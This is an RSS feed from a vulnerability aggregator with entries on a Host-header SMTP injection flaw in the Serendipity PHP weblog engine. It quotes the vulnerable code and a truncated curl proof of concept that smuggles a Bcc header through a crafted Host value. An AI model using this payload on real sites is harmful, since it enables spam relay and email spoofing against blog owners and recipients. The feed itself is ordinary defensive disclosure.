<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 21:31:20 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-291461</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-291461</link>
      <description>EUVD-2026-291461</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-291461</guid>
    </item>
    <item>
      <title>fkie_cve-2026-39971</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-39971</link>
      <description>&lt;p&gt;Serendipity is a PHP-powered weblog engine. In versions 2.6-beta2 and below, the email sending functionality in include/functions.inc.php inserts $_SERVER[&amp;#39;HTTP_HOST&amp;#39;] directly into the Message-ID SMTP header without validation, and the existing sanitization function serendipity_isResponseClean() is not called on HTTP_HOST before embedding it. An attacker who can control the Host header during an email-triggering action such as comment notifications or subscription emails can inject arbitrary SMTP headers into outgoing emails. This enables identity spoofing, reply hijacking via manipulated Message-ID threading, and email reputation abuse through the attacker&amp;#39;s domain being embedded in legitimate mail headers. This issue has been fixed in version 2.6.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Serendipity is a PHP-powered weblog engine. In versions 2.6-beta2 and below, the email sending functionality in include/functions.inc.php inserts $_SERVER[&amp;#39;HTTP_HOST&amp;#39;] directly into the Message-ID SMTP header without validation, and the existing sanitization function serendipity_isResponseClean() is not called on HTTP_HOST before embedding it. An attacker who can control the Host header during an email-triggering action such as comment notifications or subscription emails can inject arbitrary SMTP headers into outgoing emails. This enables identity spoofing, reply hijacking via manipulated Message-ID threading, and email reputation abuse through the attacker&amp;#39;s domain being embedded in legitimate mail headers. This issue has been fixed in version 2.6.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-39971</guid>
    </item>
    <item>
      <title>GHSA-458g-q4fh-mj6r — Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email head…</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-458g-q4fh-mj6r</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: s9y/serendipity&lt;/p&gt;
&lt;p&gt;### Summary
Serendipity inserts `$_SERVER[&amp;#39;HTTP_HOST&amp;#39;]` directly into the `Message-ID` SMTP header without any validation beyond CRLF stripping. An attacker who can control the `Host` header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.&lt;/p&gt;
&lt;p&gt;### Details
In `include/functions.inc.php:548`:
```php
$maildata[&amp;#39;headers&amp;#39;][] = &amp;#39;Message-ID: &amp;lt;&amp;#39; 
    . bin2hex(random_bytes(16)) 
    . &amp;#39;@&amp;#39; . $_SERVER[&amp;#39;HTTP_HOST&amp;#39;]  // ← unsanitized, attacker-controlled
    . &amp;#39;&amp;gt;&amp;#39;;
```&lt;/p&gt;
&lt;p&gt;The existing sanitization function only blocks `\r\n` and URL-encoded variants:
```php
function serendipity_isResponseClean($d) {
    return (strpos($d, &amp;#34;\r&amp;#34;) === false &amp;amp;&amp;amp; strpos($d, &amp;#34;\n&amp;#34;) === false 
        &amp;amp;&amp;amp; stripos($d, &amp;#34;%0A&amp;#34;) === false &amp;amp;&amp;amp; stripos($d, &amp;#34;%0D&amp;#34;) === false);
}
```&lt;/p&gt;
&lt;p&gt;Critically, `serendipity_isResponseClean()` is **not even called** on `HTTP_HOST` before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.&lt;/p&gt;
&lt;p&gt;Email is triggered by actions such as:
- New comment notifications to blog owner
- Comment subscription notifications to subscribers
- Password reset emails (if configured)&lt;/p&gt;
&lt;p&gt;### PoC
```bash
# Trigger comment notification email with injected header
curl -s -X POST \
  -H &amp;#34;Host: attacker.com&amp;gt;\r\nBcc: victim@evil.com\r\nX-Injected:&amp;#34; \
  -d &amp;#34;serendipity[comment]=test&amp;amp;serendipity[name]=hacker&amp;amp;serendipity[email]=a@b.com&amp;amp;serendipity[entry_id]=1&amp;#34; \…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: s9y/serendipity&lt;/p&gt;
&lt;p&gt;### Summary
Serendipity inserts `$_SERVER[&amp;#39;HTTP_HOST&amp;#39;]` directly into the `Message-ID` SMTP header without any validation beyond CRLF stripping. An attacker who can control the `Host` header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.&lt;/p&gt;
&lt;p&gt;### Details
In `include/functions.inc.php:548`:
```php
$maildata[&amp;#39;headers&amp;#39;][] = &amp;#39;Message-ID: &amp;lt;&amp;#39; 
    . bin2hex(random_bytes(16)) 
    . &amp;#39;@&amp;#39; . $_SERVER[&amp;#39;HTTP_HOST&amp;#39;]  // ← unsanitized, attacker-controlled
    . &amp;#39;&amp;gt;&amp;#39;;
```&lt;/p&gt;
&lt;p&gt;The existing sanitization function only blocks `\r\n` and URL-encoded variants:
```php
function serendipity_isResponseClean($d) {
    return (strpos($d, &amp;#34;\r&amp;#34;) === false &amp;amp;&amp;amp; strpos($d, &amp;#34;\n&amp;#34;) === false 
        &amp;amp;&amp;amp; stripos($d, &amp;#34;%0A&amp;#34;) === false &amp;amp;&amp;amp; stripos($d, &amp;#34;%0D&amp;#34;) === false);
}
```&lt;/p&gt;
&lt;p&gt;Critically, `serendipity_isResponseClean()` is **not even called** on `HTTP_HOST` before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.&lt;/p&gt;
&lt;p&gt;Email is triggered by actions such as:
- New comment notifications to blog owner
- Comment subscription notifications to subscribers
- Password reset emails (if configured)&lt;/p&gt;
&lt;p&gt;### PoC
```bash
# Trigger comment notification email with injected header
curl -s -X POST \
  -H &amp;#34;Host: attacker.com&amp;gt;\r\nBcc: victim@evil.com\r\nX-Injected:&amp;#34; \
  -d &amp;#34;serendipity[comment]=test&amp;amp;serendipity[name]=hacker&amp;amp;serendipity[email]=a@b.com&amp;amp;serendipity[entry_id]=1&amp;#34; \…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-458g-q4fh-mj6r</guid>
    </item>
  </channel>
</rss>
